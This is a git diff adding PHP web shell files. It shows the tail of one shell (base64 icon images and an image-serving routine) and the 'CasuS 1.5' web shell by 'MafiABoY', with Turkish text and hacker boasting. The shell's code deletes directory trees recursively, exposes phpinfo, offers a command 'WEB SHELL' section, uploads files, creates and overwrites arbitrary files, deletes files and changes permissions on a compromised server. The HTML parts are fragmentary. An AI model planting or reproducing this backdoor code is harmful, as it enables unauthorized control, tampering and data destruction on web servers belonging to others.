+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
+"/aZBVOqkpUa/4KisRC6rEgA7",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_theme"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAAD/AAAA/wCAAAAA".
+"gAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_url"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7".
+"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk".
+"fRQRADs=",
+"ext_vbe"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMAAAP8AAAAAAAAAAAADRii63CEgxibH".
+"kwDWEK3OACF6nDdhngWYoEgEMLde4IbS7SjPX93JrIwiIJrxTqTfERJUHTODgSAQ3QVjsZsgyu16".
+"seAwLAEAOw==",
+"ext_vbs"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAICAgMDAwAD//wCAgAAAAAAAAAAAAANQ".
+"GLrcECXGJsWTJYyybbTQVBAkCBSgyKGPl2YjCcwnG2qrV13TQBI6GwbXqb0yCgCJJYSZOK4LZPDY".
+"DHSvgEAQAGxrzQKNhgFtz+j0eM2eJQAAOw==",
+"ext_vcf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwICAAP//AAAA/4CAgIAAAAAAgP//".
+"//8AAAAAAAAAAAAAAAAAAAAAAAAAAARYUElAK5VY2X0xp0LRTVYQAMWZaZWJAMJImiYVhEVmu7W4".
+"srfeSUAUeFI10GBJ1JhEHcEgNiidDIaEQjqtAgiEjQFQXcK+4HS4DPKADwey3PjzSGH1VTsTAQA7",
+"ext_wav"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_wma"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_wmf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7",
+"ext_xsl"=>
+"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA".
+"gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh".
+"SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD".
+"dBKFfQABi0AAfoeZPEkSP6OkPyEAOw==",
+"1"=>
+"R0lGODlhGAASAPZKAAICAgISCgI6EgJqFj6aIkyiJhqWIg6WIgJ6GkKeIk6mJgJSFgJOFAIyEgJe".
+"FjaKHkKSHkKOHgI+EiJyGjqCGjaCGj6KImKqQmauSgJGEipyFip2Gi52GgJWFgIqDjZ+HiJ+LgJW".
+"GgJKEhBQGSZuHiJuFiJqFgImDlrOQiJuGiZ2HAJaFyaCHDKSHi5+GhJmFh5iFxpiFl6iQhp6Li6O".
+"HkLCKjqqJjKCGhZuFhpaFhZaFgJeGjaqJj6yJjJ+Gi56GgJSEgJmGhZOFiJaGiZmIi52KkKKNlKe".
+"PmKySnLGUnrWWip6GjaaIjKOHgJyGgIWCgoeCgIuDgJiFh5yFhJaFg5qFgp2GgqCHgJmHgJuGiZy".
+"FiJmFiKCHiaOHg5OElqaQiqGLgJ2GipyGiZqGiJmGip+HiqOIi6WJhImFgJ+HhiCGiJ6GiJqGh5m".
+"GiJ2GiaKHgImCkKONh52GhZyFhZ2GhZ+GhaGHlaWQmKmRl6iRgIiCwIeCgIaCgI2EgAAAAAAACwA".
+"AAAAGAASAAAH/4AAAQIDBAUGAYiKiYwHjQGDCAkKBQsBlpiXmpkMAQ0ODxAREKSlpqemEhMUFa2u".
+"rhYXGLO0tRkaGxwdHhm5uR8YICELGcUZIiIMDCMkJSYnKB4lJSkqGB0iKywtLi/FycswMTELJxkw".
+"6DIzDCs0NTY3GzgZDAsdIzk5Ojr5/Rg7DFTw6OHjBwcNIoA4CDJCyBAiRYwcQZJECYYVC5YwafLD".
+"4AaFA5yMeALlRBQJIjpIGfBvxZQbBTds0EClipUrIwJE0RnAA6QAGLBIyaKFg68tMCZw6ZLTSwAR".
+"ATL8/AImS5gJYjaIGUOGRBkzZ3L+HBsADYY0atakYNOGDBs3LEfemMm5c6dPOJDMxuEiB4ffOXTq".
+"qLHT9GnUwxLK3sGAJ4/jPHhoiSVLufJPujzvBsCLV08Az3sC8BEdoDBUqVITJ+7jqbXmQAA7",
+"2"=>
+"R0lGODlhPwASAOUDAFmwLFGkJUKQHmauSgBNEgBOEgBYFgBXFgBlGQBkGQByGgBxGgBzGgqAHQCB".
+"HQ2BHQqCHRCCHSWNHySOHyWPICePICuXJSyWJSmXJSmPICeQISaPIBaFHQAQCgAZCgAXCgAWCgAU".
+"CgASCgAlCgAhCgAfCgAbCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAPwASAAAG40CAcEgsGo/IpBIZ".
+"aDqf0Kh0Sq1OBdisdsvter9g72BMLpvP6LR6nS643/C4fE6v2+/4vH4vNxz+B35/BoSCgYWAh4SJ".
+"iIqLgYyJkokIlZaXmJmam5ydmwqgoaKjpKWmp6imEA4QrayrrbGys6+ztreuuLMPEBESv8DBwsPE".
+"xcbHwxobFhfNF8zPztHT09DN0NbZ0tbU0s7QGeHhGuLi5OXo6eYa5+ru7xkbHPP09fb3+Pn6+/ls".
+"/v8A/4kYSLCgwYMIEypcmNCDCBAPIzKcSLGiwREiSIgoIcKhQ4gQLYocKSIIADs=",
+"3"=>
+"R0lGODlhBgASAOUDAFmwLFGkJUKQHmauSmGoQz2IIDeCGwBUFwBZGiB/LjR+Hyt2GQBOEgBPFABV".
+"Fyl0HgBXFgBYFwBbFwBjGTCEMFmiQQBmFwBpFwBtGQBzGhKCIGWtSgB2GwB6HQB/HQCCHRuIHwCE".
+"HRCGHRKJHRKLHR2PICWPICSPIC2XJCyWJSmXJCmWJCmaJUOMO1iYQimPICyPIhImFB+IHySOIUGK".
+"OAAQCliXQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAABgASAAAGSkCAcBgoGgXI5GBA".
+"KBgMEERioFgwGA3I4AGRSCaUiuWCyWgGnI7nAxqERKNRaTAz2VGDFEvfcsH+MAMxMjM0gjVLNjE1".
+"jI2Oj49BADs=",
+"4"=>
+"R0lGODlhQgASANQJAFmwLFGkJUKQHjeCGyt2GSFsFx1gFhtZFIrdY4zdZIndYobdYoPdYILdX4Dd".
+"X3/dXgBvGQBuGQBwGQAQCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAA".
+"QgASAAAFlSAgjmRpnmiqrkHrvnAsz3RtC3iu73zv/8DgYEgsGo/IpHLJJDif0Kh0Sq1ar4Wsdsvt".
+"er/gsNhALpvP6LR6zW4f3vC4fE6v2+94hB6R6Pv/fnoJeguFhgiFDIqKDY2OjQ+GC3uCgJYRmJma".
+"m5ydnpgSn6KeE6Wmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsMhADs=",
+"5"=>
+"R0lGODlhIQASAPYtAFmwLBqWIAASCg2VIEugJD6YIABqFwA6EAAAAFGkJQBSFABOFE2iJE6lJUKd".
+"IgB5G0KQHkGPHTaJHQBdFgAzEDeCGzuBGiBxGQA+ECt2GQAtDQBFEi53GSpwFyFsFwAnDVrNQgAq".
+"DSFqFyVsFxBQGR5hFhtgFhtZFBdZFIDdX3/dXobdYondYozdZInaYofYYYPTXn3MW3jEV3G6UWix".
+"TF+lRVWYP0qLODx7LjNvKShhIRlYHRJQFxRKFA1GEgBuGQBlFwBaFABUFAAzDQ0dCgoZCgoWCgAW".
+"CgAaCgAeCgAiCgAlCgA3EABKEg1OEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwA".
+"AAAAIQASAAAH/4AAgoOCAQKGiIeKA4sCAAQFBgcCCAmWl5YKApqcm56dCwIJDA0OD5MQqaqrrK2u".
+"ERASExQVtba3uLm6tRYXGBnAwcLDxMMKGhscGR0bHs7P0NHS0R8gISIeIyQl3N3e3+DfCh8bJtwk".
+"J+nq6+zt7ijwJiQpKSor9yss+votLSwuL2DEkDGDRg0bN3Dk0LGDRw8fJH5InEixokQDQCYEEbJg".
+"A4YhGj4QKWJEAAkBAo6kXIlEQMuWSQQokSlgSc2bIQRo0GnypYCYM23azElBQFEmAjAkFbCBqYAm".
+"ApyYREm1qtWrWK2eXKlSpU+YNIPeHMpzJwmfQMcKIGpUAFKlSiObNoUqdWvWu3ipbu3K0qXftGKF".
+"ri3b8y9NwWyPLo3rlK7JQAA7",
+"font"=>
+"/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAACgAA/+4ADkFkb2JlAGTAAAAAAf/b".
+"AIQAFBAQGRIZJxcXJzImHyYyLiYmJiYuPjU1NTU1PkRBQUFBQUFERERERERERERERERERERERERE".
+"RERERERERERERAEVGRkgHCAmGBgmNiYgJjZENisrNkREREI1QkRERERERERERERERERERERERERE".
+"RERERERERERERERERERERERE/8AAEQgAlACUAwEiAAIRAQMRAf/EAHAAAAMBAQEAAAAAAAAAAAAA".
+"AAACAwEEBgEBAAAAAAAAAAAAAAAAAAAAABAAAQMDAwMCBQIFBAMAAAAAAQAR4iGhAjESA0FhcVEi".
+"8IGxwRPhwvFSgvIE0TJCYnKSohEBAAAAAAAAAAAAAAAAAAAAAP/aAAwDAQACEQMRAD8A85yO+rfO".
+"SMMvTp3kjIkmvyrJPjk3WnmSCZyJLuPj+pM2QZ+veSTLlr28yVMeQkit5IMz4wA4y+P/AGUiW63k".
+"unPMnWnx/wCS5ssvT6yQU489oZ9e8kFvW8k/DmG/WSjvO7W8kDbiOr/OSMcq0+slu7veSwcvobyQ".
+"Bc6m8kbm63kjLItreSmM263kguSRi7hvMlIE7daeZLTyk47fvJZv9rPeSB+PlFHN5JuUhwxvJQxI".
+"epvJVJALfeSBcvR7yWYgkt95KmTNreSXHLIGhf5yQY3Tr5khbuL9/MkIH5eQO7v85KQzJ63ktJ9r".
+"veSUZt1vJBmRY1N5JvyBh27ySnJ6veSelK3kgtnlUg0Px3UTlVwbyVTlj0L/AB5UX73kgph7tcm+".
+"clI5B6GnmSfAEuX7ayUiWOt5IH30d7yWYZN1vJLuej3kqYgnreSBs83x1vJSf1N5J26veSXI97yQ".
+"dGO3Z8vWSRxs1r5kjEPjreSwYvjue8kExUO95LTyHqbyW8ebGpvJNzZuQxvJAm/veSrxkvreSgcj".
+"63kqcRJOtPMkGv7nfr6yQt7PeSEGZ5FyD9ZJMcvU3kqZkklzeSHp7vrJBPLIPreSCSCK3kinQ3km".
+"3gsB9ZIH5c2AANR/2/UKb97yVs8AA73ko5HveSCmPLtDfeSi7nW8lTHHdiwNX9ZKbt1f5yQGXq95".
+"KoY1fp6yU3y9byVMX13afH8yBeTJgz3ksGYNHvJGWXTL6yWBh1vJBYPtcZfJ5KR5CcWGnmSc8hAH".
+"j1kp45tT7yQbhkOpp5kmzOIIA+slmIchzeSblYEMbyQKW9byTY57TreSzIhqGvmSkSfW8kFvyV1v".
+"JCVy2tfMkIN5OYE0L/OS0ZuKG8knKQDT6yT8eQABe8kGFuv1knOeIY4mvmShnybsne8lXEilbyQY".
+"f8g5UJp5kkOXe8lbkxxxLg9fWSm/e8kG8eJy6t61ksdtDeSpxAkODr3koZ51Z9O8kGnkagN5Jxyg".
+"9byUX73kqOB1vJBQl8XBr5kpO3W8lhyOr3kmJ7695IN3ECj+XkgY+13vJWxzGxn6eslHcW1p5kg3".
+"HIir3ksy5zkdbyWDKoreSCADQv8AOSBssgRrXzJKC9HvJYToXvJNjlV3vJAbqs9fMkJfy+7W8kIN".
+"5BtLPeSMPN5Izy9TXzJbg563kgnka0N5LRmSQHvJNl7Sz3kkGTHW8kHTy4ZYiuT/ADkucEvreSuf".
+"8jeGP1kkOVdbyQU4ssgA1X7yXPmfca3kuri5RjiQTV/WS5+TJ8nBp5kgmS3W8loJPW8kwyB63kmx".
+"yGNXvJApyo33kjfUVvJWzO7HdoK/GqiD3vJAEFv1kgZ0b7yXTjyDYzjT1kpbwBrXzJACoYm8kcjY".
+"ZMDeSOM7tTTzJbyjHEit5IJ5Gmt5JsMhiam8kZZgdbySb3qDeSBt2O93p5khJ11vJCB8uQEu95IH".
+"K1B9ZIzGzrTzJKM2IL3kgw51qbyTZ9jeSCXOtPMlmWTChvJBozb+MkmRrreSbHkHU3kseut5IOr/".
+"AByAKm8lLMsSQbyWYEHreSUcrn9ZIDcDqW+ck4yx9byWbu95Jg3reSDCCQ708ySu3W8lXPNsaGnm".
+"S5xyepvJBfHEbO/mSk3td7yTa47hleSXHIka08yQHGcnobyW8m5wcjeSbHMBq3kt5Mjk3T5yQSyJ".
+"P8ZJ8GBd7yQdNbyWYgks7jzJAbxud7yQl9rs95IQPyA0BN5KenW8lXk5NzMdKayUhm9AbyQBypre".
+"Sw5uNbyWkt1vJA7m8kGP3vJG7veSYZd6eZIJrreSBRkRV7yRjlXW8lXjALv9ZJMvaTWg7yQZln0e".
+"8lozINTeSXd3vJM/w8kD5Znb+slHd3vJdBOO0jQ+ZKIHqbyQaOUtte8kwy9rPeSMdur18yT45A4d".
+"/MkGcf8AM/X1kn5+bEttN5KfQl6eZJMyKAGnmSDTyd7yW4cjn9ZJMqdbyTcZ73kg1qt18yQm/IHd".
+"7yQgzLIavr3kkNKg3km5CMdDeSXHMk63kgN/V7yTFmBB17ySZmut5IORYVvJA+BHU3kkyzrreSMM".
+"u95Jz8VkgfibIO95JMg2RreSfiJqx07yU8+Ri5NfMkAcgOt5KgzB0N5Ln3P1vJbubreSDpzwYO95".
+"KDtV7yTfnLN95LH7695IKBzj/up5kkFA73knx5iAB95JTmWp9ZIDfqH17yUn73krAghnr5kt5Msc".
+"urHzJBHcepvJNhk51vJaR3vJGPIMTreSAY7tr3khDl9z18yQgzIsKm8kmJcs95J+XMZMxvJLiSC7".
+"3kgCW63ktOb0+8kHNyS95LciWDG8kGA97yWDMuz3kgZd7yT6dbyQNhltBL08yU+XJ8nfXvJUxzAB".
+"B+slPkz3VfXvJAm7veSbd3vJYC/W8k7j1vJBhyG3WvmS05UFbyQzhwbyWP0e8kFN4Ad3PnT/AOkn".
+"5faz3kr45DbqNPWSmcBt3PeSDOPIUreStysQP9ZLlxJ9aeZKuZ29aeZIDIBtbyS7gOt5JDmT1vJO".
+"MgRreSBfy/DyQl6s95IQV5d1H/clG743IQgT3dP3Kvu+NyEIEx3fG5GX5H/uQhA2O7/l+5FXpp/U".
+"hCBMn6fuW4bvjchCBzvamn9SQbuv7kIQWDtRnb/son8jV0/qQhBuO7b/AHIz/J1/chCBDu+Ny3Dc".
+"/wDchCA97/3IQhB//9k=",
+"pdisk"=>
+"R0lGODlhEQAMAOZkAODg34mJicfHx4GBguHh4WxsbObm5dDQ0H5+fnl5eYKCgv3+//Ly8t/f3svK".
+"yqKios/PzsDAwKempktKS87NzaCgoE5OTnFyco2NjLu7u1JRVvf4+Pv+/4CAgMHAv9LS0mVldFdX".
+"V0VFSsTDw7i4uXZ2dqSjpKWkpNzb24uLkMzM3efn5uzr60NDRoSEjmhnZ6usq+Tk49HR0HJyco6O".
+"jlNTW3Z2hNjY2MHBwfHw8Dw8P9XV1KOjpNnZ2MvLytzc24mJjXh4ipeXl2JjY5STk25vdYqKiamp".
+"qV1dXunp7Gxsa52cnHl5fZiYtrq6u9TU1ExMTq+vrvb3+FNTU+7t7srJyTQ0NO3s7Ozs63t8fE5N".
+"Urq5unBwdZqamujn54CAktbV1X18fbW1tdTU0wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAGQALAAAAAARAAwAAAeLgGSCg4SFhoeIZCwoAmArFDtPC4UxABkJBSQMC1cAGw44PoNOYw0C".
+"BAAMHFgNUkkqKUBeZBVLYqcGBzcfI11MLV82CGQSUUIKJlsyNJgDQ1ZNQUpkOQEBVTwdCmEWFwhF".
+"IBpTWYMeAyUYJ1w6IjVQITNHP4RUEEQvLloTSAERBok9YBh5cCCRQUKBAAA7",
+"odel"=>
+"R0lGODlhEQAPAKIEAFQhHFQhG1MhG5QaHQAAAAAAAAAAAAAAACH5BAEAAAQALAAAAAARAA8AAAMq".
+"SLrc/jDKIZoYb+iqgsbOVwFf9JGaRHypilLqxQaRl4rPu+AhuPuqYDABADs="
+
+);
+$imgequals = array(
+"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
+"ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
+);
+ ksort($arrimg);
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v)
+  {
+if (in_array($img,$v)) {$img = $k;}
+  }
+  if (empty($arrimg[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($arrimg[$img]);
+ }
+ else
+ {
+  echo  "
    ";
+  $k = array_keys($arrimg);
+  foreach ($k as $u)
+  {
+echo $u.":
    ";
+  }
+  echo "
    ";
+ }
+ exit;
+}
+if ($act == "about")
+{
+ $dàta = "Any stupid copyrights and copylefts";
+ echo $data;
+}
+
+$microtime = round(getmicrotime()-$starttime,4);
+
+?>
+
\ No newline at end of file
diff --git a/php/CasuS 1.5.php b/php/CasuS 1.5.php
new file mode 100644
index 0000000..d6f6fde
--- /dev/null
+++ b/php/CasuS 1.5.php	
@@ -0,0 +1,368 @@
+read())        {
+                if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
+                        @chmod("$deldir/$file",0777);
+                        deltree("$deldir/$file");
+                }
+                if (is_file("$deldir/$file")) {
+                        @chmod("$deldir/$file",0777);
+                        @unlink("$deldir/$file");
+                }
+        }
+        $mydir->close();
+        @chmod("$deldir",0777);
+        echo @rmdir($deldir) ? "
    SYLYNDY:$deldir/$file
    " : "
    Silinemedi:$deldir/$file
    ";
+        }
+
+if ($op=='phpinfo'){
+$fonk_kap = get_cfg_var("fonksiyonlary_kapat");
+        echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "
    phpinfo() Komutu Çaly?myyiii
    ";
+        exit;
+}
+
+if ($op=='me'){
+echo "
+      
+            CEHENNEMDEN ÇIKAN ÇILGIN TÜRK
+      
+      
+      
    Fazla söze gerek yok...
    
+      

    O yanlyz bir kovboy,
    
+      
    O cehennemden çykan çylgyn TÜRK,
    
+      
    O bir rap manya?y,
    
+      
    O bir php coder,
    
+      
    O'nun hackten daha çok sevdi?i tek ?ey iki hack,
    
+      
    O...
    
+      
    O'nun kim olduunu biliyorsunuz O tabiki...
    
+      
    ";
+
+$sayi='7';
+while($sayi>=1){
+echo "
    HACKLERIN EFENDISI MAFIABOY 
    ";
+$sayi--;
+}
+$sayi2='1';
+while($sayi2<=7){
+echo "
    baddog@hotmail.com
    ";
+$sayi2++;
+};
+
+echo "
+      ";
+exit;
+}
+
+
+echo "
+      
+             CasuS 1.5 by MafiABoY
+      
+
+       
+       ";
+
+echo "
     CasuS 1.5!!! Powered by MafiABoY

    
+      
    A TURKISH HACKER
    
+      
    ";
+echo "
    ANA BOLUM
    ";
+echo "
    ";
+echo "
    PHP INFO
    ";
+echo "
    ";
+echo "
    WEB SHELL
    ";
+echo "
    
+      
    
+      
    ";
+echo "
    --->MafiABoY<---
    ";
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "
    
+      Root Klasör: $DOCUMENT_ROOT
    
+      CasuS 1.5'in URL'si: http://$HTTP_HOST$REDIRECT_URL 
    ";
+
+if(!isset($dir)){
+$dir="$default";
+}
+echo "
+
    
+
    
+
    ";
+
+if ($op=='wshell'){
+echo "
    WEBSHELL
    ";
+if (isset($ok)){
+if (empty($kod)){
+die ("
    LEN MANYAK KOMUT YAZMAZSAN NE MOK Y?YNE YARAR
    ");
+}
+echo "
    
+      
    ";
+echo "
    
+      
    
+      
    ";
+echo "
    ";
+exit;
+
+} elseif (empty($ok)){
+echo "
    
+      
    ";
+echo "
    
+      
    
+      
    ";
+echo "
    ";
+exit;
+}
+}
+
+if ($op=='up'){
+        $path=dir;
+        echo "

    DOSYA GONDERME

    ";
+if(isset($dy)) {
+
+if(empty($dosya_gonder)){
+} else {
+copy ( $dosya_gonder, "$dir/$dosya_gonder_name") ? print("$dosya_gonder_name kopyalandy
    ") : print("$dosya_gonder_name kopyalanamady
    ");
+}
+
+if(empty($dosya_gonder2)){
+} else {
+copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_name kopyalandy
    ") : print("$dosya_gonder2_name kopyalanamady
    ");
+}
+
+if(empty($dosya_gonder3)){
+} else {
+copy ( $dosya_gonder3, "$dir/$dosya_gonder3_name") ? print("$dosya_gonder3_name kopyalandy
    ") : print("$dosya_gonder3_name kopyalanamady
    ");
+}
+
+if(empty($dosya_gonder4)){
+} else {
+copy ( $dosya_gonder4, "$dir/$dosya_gonder4_name") ? print("$dosya_gonder4_name kopyalandy
    ") : print("$dosya_gonder4_name kopyalanamady
    ");
+}
+
+} elseif(empty($dy )) {
+$path=$dir;
+$dir = $dosya_dizin;
+echo "$dir";
+echo "
    ";
+echo "

    ";
+echo "

    ";
+echo "

    ";
+echo "

    ";
+
+echo "
    ";
+echo "
    ";
+
+
+echo "";
+}
+}
+
+
+if($op=='mf'){
+    $path=$dir;
+    if(isset($dismi) && isset($kodlar)){
+                $ydosya="$path/$dismi";
+                if(file_exists("$path/$dismi")){
+                        $dos= "Böyle Bir Dosya Vardy Üzerine Yazyldy";
+                } else {
+                        $dos = "Dosya Olu?turuldu";
+                }
+                touch ("$path/$dismi") or die("Dosya Olu?turulamyyor");
+                $ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açylamyyor");
+                fwrite($ydosya2, $kodlar) or die("Dosyaya yazylamyyor");
+                fclose($ydosya2);
+                echo "
    $dos
    ";
+        } else {
+
+        echo "
    ";
+        echo "
    Dosya Ysmi :

    ";
+    echo "
    ";
+    echo "
    KODLAR

    ";
+    echo "
    ";
+        echo "
    ";
+    echo "
    ";
+        }
+}
+
+if($op=='md'){
+        $path=$dir;
+        if(isset($kismi) && isset($okmf)){
+                $klasör="$path/$kismi";
+                mkdir("$klasör", 0777) or die ("
    Klasör Olu?turulamyyor
    ");
+                echo "
    Klasör Olu?turuldu
    ";
+        }
+
+        echo "
    ";
+        echo "
    Klasör Ysmi :

    ";
+        echo "
    ";
+        echo "
    ";
+        echo "
    ";
+}
+
+
+if($op=='del'){
+unlink("$fname");
+}
+
+
+if($op=='dd'){
+        $dir=$here;
+                $deldirs=$yol;
+                if(!file_exists("$deldirs")) {
+                        echo "Dosya Yok";
+                } else {
+                        deltree($deldirs);
+                }
+}
+
+
+
+if($op=='edit'){
+$yol=$fname;
+$yold=$path;
+if (isset($ok)){
+$dosya = fopen("$yol", 'w') or die("Dosya Açylamyyor");
+$metin=$tarea;
+fwrite($dosya, $metin) or die("Yazylamyyor!");
+fclose($dosya);
+echo "
    ";
+} else {
+$path=$dir;
+echo "
    DÜZENLE: $yol
    ";
+$dosya = fopen("$yol", 'r') or die("
    ");
+$boyut=filesize($yol);
+$duzen = @fread ($dosya, $boyut);
+echo "
    ";
+echo "

    ";
+echo "
    ";
+fclose($dosya);
+$duzen=htmlspecialchars($duzen);
+echo "
    ";
+}
+}
+
+if($op=='efp2'){
+$fileperm=base_convert($_POST['fileperm'],8,10);
+        echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "$dismi2 YSYMLY DOSYANIN" : "DEY?TYRYLEMEDY!!";
